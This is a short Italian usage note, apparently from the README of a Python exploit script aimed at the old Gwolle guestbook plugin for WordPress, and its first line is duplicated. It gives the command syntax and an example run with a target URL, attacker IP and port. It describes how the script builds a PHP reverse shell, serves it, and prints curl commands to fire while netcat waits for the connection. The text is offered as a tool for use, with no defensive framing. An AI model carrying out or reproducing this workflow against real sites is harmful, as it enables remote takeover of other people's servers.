
questo script è un exploit per il vecchio plugin gwolle di wordpress
questo script è un exploit per il vecchio plugin gwolle di WordPress
uso:
./gwolle_buster.py <target_url>
primo argomento <target_url> => l'URL del tuo target WordPress con gwolle installato secondo argomento => il tuo IP terzo argomento => porta in ascolto per la reverse shell
esempio: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
Questo script genererà lo script php di reverse shell e avvierà il semplice server, quindi devi aprire 2 nuovi terminali e mettere in ascolto netcat sul primo terminale, e fare richieste con i comandi curl, comunque, i comandi vengono generati automaticamente e appaiono nella console, quindi puoi copiarli e incollarli facilmente